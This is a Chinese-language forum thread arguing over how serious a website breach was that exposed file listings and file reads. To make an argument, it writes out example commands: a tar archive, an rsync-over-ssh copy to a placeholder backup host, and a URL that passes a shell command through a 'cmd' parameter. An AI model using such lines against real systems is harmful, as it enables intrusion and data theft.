nenemalo wrote:
@@..............................
資訊取得速度竟然沒有蓋大樓的快
taiwangt wrote:
檔案都list出來
又有權限可以read
當然是整個打包回家阿
要對檔案貓阿狗阿的都隨便了
有沒有系統控制權重要嗎??
(恕刪)
有~~而且很重要
你沒有辦法取得shell,如果網站也沒有對應的程式讓你執行shell,你怎樣打包?
網頁可不一定有辦法讓你下tar zcvf xxx.tar.gz /xxx
或者是rsync -azP -e ssh xxx backup_ip:/backup
目前我看到的資料都還是要透過它既有的程式來跑
如果哪個程式出現http://xxxx/cmds?cmd=tar%20/xx.tar.gz%20/xxxx (懶得encode,真的會的人,自己會encode)
那麼我相信打包帶走應該很簡單,問題是我目前還沒看到有這種資訊流出阿
更何況是,他主機有開放ssh/telnet進去?不然你取得那些資料要幹嘛?
我可以給妳我電腦帳號密碼,甚至IP
寫一個網頁讓你隨意帶參數,可以把ascii檔案內容讀給你看,也可以讓你帶參數可list資料夾
那麼你有辦法執行我電腦上的任何shell,做更進一步的事情?
所以我才說,破了系統(OS)價值幾乎等於0,真正的重點在DB阿
你如果懂SQL injection,你就會知道這次的case比起SQL injection造成shell被意外執行的問題,根本就沒啥
內文搜尋





的重要人物應該全是用人頭登記的






















































































